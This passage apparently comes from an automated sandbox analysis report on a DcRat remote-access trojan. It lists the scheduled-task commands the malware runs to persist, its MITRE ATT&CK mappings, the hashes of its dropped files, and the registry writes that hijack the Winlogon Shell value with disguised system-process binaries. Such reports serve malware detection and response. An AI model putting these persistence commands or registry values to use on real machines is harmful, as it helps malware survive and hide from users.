schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 13 /tr "'C:\Windows\SoftwareDistribution\ScanFile\schtasks.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2720

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtasks" /sc ONLOGON /tr "'C:\Windows\SoftwareDistribution\ScanFile\schtasks.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:1244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "schtaskss" /sc MINUTE /mo 9 /tr "'C:\Windows\SoftwareDistribution\ScanFile\schtasks.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1124

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\dwm.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2904

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:700

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 11 /tr "'C:\Users\Default User\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2528

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\winlogon.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2568

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 10 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\winlogon.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 11 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe'" /f
1⤵
- DcRat
- Process spawned unexpected child process
PID:2380

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:2932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\System.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:772

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Favorites\spoolsv.exe'" /f
1⤵
PID:2732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\Favorites\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2548

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Users\All Users\Favorites\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:2088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\bridgeHyperCrt\taskhost.exe'" /f
1⤵
- Creates scheduled task(s)
PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\bridgeHyperCrt\taskhost.exe'" /rl HIGHEST /f
1⤵
PID:1724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 11 /tr "'C:\bridgeHyperCrt\taskhost.exe'" /rl HIGHEST /f
1⤵
PID:2812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Windows\RemotePackages\RemoteDesktops\lsass.exe'" /f
1⤵
- DcRat
PID:1888

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\RemotePackages\RemoteDesktops\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2148

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Windows\RemotePackages\RemoteDesktops\lsass.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2332

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\taskhost.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1604

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\taskhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 14 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:3056

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\csrss.exe'" /f
1⤵
- DcRat
PID:2976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\csrss.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\csrss.exe'" /rl HIGHEST /f
1⤵
PID:2128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 10 /tr "'C:\MSOCache\All Users\taskhost.exe'" /f
1⤵
PID:2836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\MSOCache\All Users\taskhost.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:2404

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\taskhost.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\spoolsv.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:1244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2360

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\spoolsv.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
PID:2316

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:1664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 11 /tr "'C:\Windows\AppCompat\Programs\audiodg.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\AppCompat\Programs\audiodg.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:2616

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\Windows\AppCompat\Programs\audiodg.exe'" /rl HIGHEST /f
1⤵
PID:2532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Recent\lsm.exe'" /f
1⤵
PID:2336

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\Users\Default\Recent\lsm.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:2324

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\Users\Default\Recent\lsm.exe'" /rl HIGHEST /f
1⤵
PID:2164

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Microsoft Help\spoolsv.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft Help\spoolsv.exe'" /rl HIGHEST /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\Microsoft Help\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:1428

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\dwm.exe'" /f
1⤵
- DcRat
- Creates scheduled task(s)
PID:816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- DcRat
PID:972

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\dwm.exe'" /rl HIGHEST /f
1⤵
- Creates scheduled task(s)
PID:2968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\b75386f1303e64

Filesize
771B

MD5
9d9942e274082564db8dc49f8f85e2cf

SHA1
017ae77a8e666f0b66ffd3db0a7a2e0641bc49c3

SHA256
1c958e0daf685fc397c51ce0642fe7b03e86c9f8e42c5587868b65fd56d8d038

SHA512
475a3a960a829cde86882b4e03d8acb37e74f54b428e2d95a1124256792709d46437ccdb2a079feda8fca02e8544b3ad49321c95da0c4a28edb09e272bdb5589

Download Submit
C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\886983d96e3d3e

Filesize
820B

MD5
f76892fa641a14b67f4d8f504966f6c8

SHA1
29998e5b51d16eeba621ca9550a2d742fe037554

SHA256
a4d90bd9288dd13d1582a73dc1e61c3233280d9de7b65f51e0277a1e595c243a

SHA512
8eacc452a2172144fd3dd9b822781670e276a239fa5668769872e545a8c40480060a6e84af6878830471bb61e86b26f42bbb226372d44b9f444fe2a1f21ae09c

Download Submit
C:\Users\Admin\AppData\Local\Temp\FcQJYipO6s.bat

Filesize
224B

MD5
ced59f9869f5143ee47ec2cddb80d160

SHA1
7858eb522f51a6c84513612b36a53c413fcbdc2d

SHA256
c1e867b268b23057f090479f3200570279fe2deccbcd23e12ef23a4fa96e40f8

SHA512
e75f2856eb5b0be3ca400a8c1e1a7e4a82fed858bec918661af6715dbe07c00144b5064194924194b0189202d85c00607893492be57a874c87e7d25520568c10

Download Submit
C:\Users\Admin\AppData\Local\Temp\W8DBmfjgM5.bat

Filesize
221B

MD5
5748c7b0a52c2f5da5a05d84ab80fd49

SHA1
172a8ec3619207bc8c7dc147979acc1753cfa1d5

SHA256
093d434a33f31d5bc170767c913ddb1b7175c5cb707c2deb794fb7f21045f706

SHA512
06bc5e2b5a451c8a037a16a58a1e11f0dd5366b14b560d27b06e2e0bdbaff2c0608912656133a4d1e0c4d8c166a322ecff3e726a05604632324f708db078d50d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
812deb4d6b024386139a41172a0405ee

SHA1
a5d98b65c52bb3182126cca9e66c291d51d6d1cb

SHA256
956f9dee53e8512d3db013713bd7f66dbd55135c72e4993f622fb45cc106b8f1

SHA512
be6d11d40e714de3ce5c41bae931769392e7f18388dddfe74c4ca3f45f939e57e82642ddcc0c717991c66a20e0b0215a3636b4be88c96a85c86a7be218d8ae3f

Download Submit
C:\bridgeHyperCrt\FOAEdrh1BxsF.vbe

Filesize
231B

MD5
91dfc7252bcd06d82af9f64190b08c7e

SHA1
4eea175d57c3631c0dab65cff1c325d59b5d34a8

SHA256
fdee20a4260f6ba25d38608473eb51910fd1780e104edc51b7feea672f23858b

SHA512
b56eea94d6f4660f1022464c82d0595c8ddf18fdd5977c6bc9dd7baae2c8090d188b418c1b6d2556e3b630823d526b27640d06fe8a5f6fffc776caa4907b2d30

Download Submit
C:\bridgeHyperCrt\OI0pwrYEs8WKMbQhaocS5DTAkNJim.bat

Filesize
69B

MD5
ae3ca8c85d0b24e4a5d8665f7cb83466

SHA1
cea7807241d92dca00ed5d9283e21142ffbbb14c

SHA256
afddd637f38e2c904b3c6c717d6277fe9f9566e29f2940e371289ab259f4e869

SHA512
e3379655f409bd348fbcf61be7cba93627b0a3fb30cadc47f036e3fe03a69d2e9631d7339984ae426cbd5145db1c22a9aec5c98f5806ef0caf1bf69a412c1c99

Download Submit
\Users\Admin\AppData\Local\Temp\Realtek HD Audio Universal Service.exe

Filesize
2.5MB

MD5
3389fc2b0cbe478b8ff249b7fedc75ed

SHA1
949a474ba3ad5913504b999516e0e7aac6d1854c

SHA256
7e4efd43ace17028eacb97352fe2ea46d44b96aca3068130b0cdec4dbba081b1

SHA512
707f7bcf0d86212654d1f69f2dd8e753dc8a67a1bc9d5a5132e60c852ba6d4b30063656e0e6f87104ec7825404add94e8bfff5ec1757df7add4c1b604cd30313

Download Submit
\Users\Admin\AppData\Local\Temp\Updata.exe

Filesize
303KB

MD5
fa8baa8b5f5e19777e1b20104defff51

SHA1
a17922c107c303693489530dbfa3bb20afc24e59

SHA256
42538f0378843cc317f37ff9731b8c917f6763d811c0fde29bac25b759402f47

SHA512
4e2478795dacfe440860f03c8b0e318f238b2d2e09e278c995b49a90415ff275c87645f3d22cbff6102e5db683d4d98f0ef13abb6002eb19c647f86ec8d69d62

Download Submit
\Users\Admin\AppData\Local\Temp\javaw.exe Java(TM) Platform SE binary.exe

Filesize
66KB

MD5
52409e4dbf9ed75c7fd6fbb4e7b1593c

SHA1
b2124798396292059c64fcb5e3d40a742ea66f0b

SHA256
8c63a9bbb49745a61fbf450e78485966222810403844af067f43046092b02112

SHA512
b72e769ced2813f5c93731e9c96bdafeb7359c9aa2b23fe9cb8bea675e1c2fcb2a7208b21bf0fc73d8255ee73bb732aea58ff7ff3a14c7727425947fa3f5c1a7

Download Submit
\bridgeHyperCrt\Realtek HD Audio Universal Service.exe

Filesize
2.2MB

MD5
8b8ad5d190af5992165ab74f2c4d2539

SHA1
4c7dcd839b39b6da31c575e6c0078b948c486ca0

SHA256
fa7c73b719b35f3ed6e23c1c1f216f9c344a3a95a46d9779ddb90cacbde81624

SHA512
eb957611286cc642dac606a2cd65ae49a67c15832f5383983dc65075d48ab7c4c74873a30cbf9ff024b29d0282b2e1e6e731365a78f23c912fbd5a799568aa0c

Download Submit
memory/808-167-0x00000000000E0000-0x0000000000324000-memory.dmp

Filesize
2.3MB

Download
memory/1376-55-0x0000000000DE0000-0x0000000001024000-memory.dmp

Filesize
2.3MB

Download
memory/1808-104-0x000000001B720000-0x000000001BA02000-memory.dmp

Filesize
2.9MB

Download
memory/1808-105-0x00000000027F0000-0x00000000027F8000-memory.dmp

Filesize
32KB

Download
memory/2020-124-0x00000000010E0000-0x0000000001324000-memory.dmp

Filesize
2.3MB

Download
memory/2612-30-0x0000000000310000-0x0000000000326000-memory.dmp

Filesize
88KB

Download
memory/2612-168-0x000000001AF80000-0x000000001AF8C000-memory.dmp

Filesize
48KB

Download
memory/2752-29-0x0000000000F90000-0x0000000000FE2000-memory.dmp

Filesize
328KB

Download
memory/2852-20-0x0000000000400000-0x0000000000BC8000-memory.dmp

Filesize
7.8MB

Download
memory/3020-112-0x00000000002F0000-0x00000000002F8000-memory.dmp

Filesize
32KB

Download
memory/3020-111-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

Filesize
2.9MB

Download

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", \"C:\\bridgeHyperCrt\\taskhost.exe\", \"C:\\Windows\\RemotePackages\\RemoteDesktops\\lsass.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\taskhost.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\""	Realtek HD Audio Universal Service.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Windows\\Prefetch\\ReadyBoot\\System.exe\", \"C:\\Program Files\\Windows Sidebar\\fr-FR\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files (x86)\\Microsoft Sync Framework\\cmd.exe\", \"C:\\MSOCache\\All Users\\{90140000-0011-0000-0000-0000000FF1CE}-C\\csrss.exe\", \"C:\\bridgeHyperCrt\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Program Files\\Windows NT\\javaw.exe Java(TM) Platform SE binary.exe\", \"C:\\Windows\\AppPatch\\Custom\\winlogon.exe\", \"C:\\bridgeHyperCrt\\dllhost.exe\", \"C:\\Program Files\\Windows Journal\\smss.exe\", \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-001A-0409-0000-0000000FF1CE}-C\\conhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\Microsoft\\Updata.exe\", \"C:\\Windows\\ModemLogs\\Realtek HD Audio Universal Service.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\csrss.exe\", \"C:\\MSOCache\\All Users\\taskhost.exe\", \"C:\\bridgeHyperCrt\\schtasks.exe\", \"C:\\Users\\Default\\Local Settings\\Idle.exe\", \"C:\\bridgeHyperCrt\\WmiPrvSE.exe\", \"C:\\Windows\\SoftwareDistribution\\ScanFile\\schtasks.exe\", \"C:\\Users\\Default User\\dwm.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\winlogon.exe\", \"C:\\Recovery\\77984722-d108-11ee-bdd4-c695cbc44580\\System.exe\", \"C:\\Users\\All Users\\Favorites\\spoolsv.exe\", 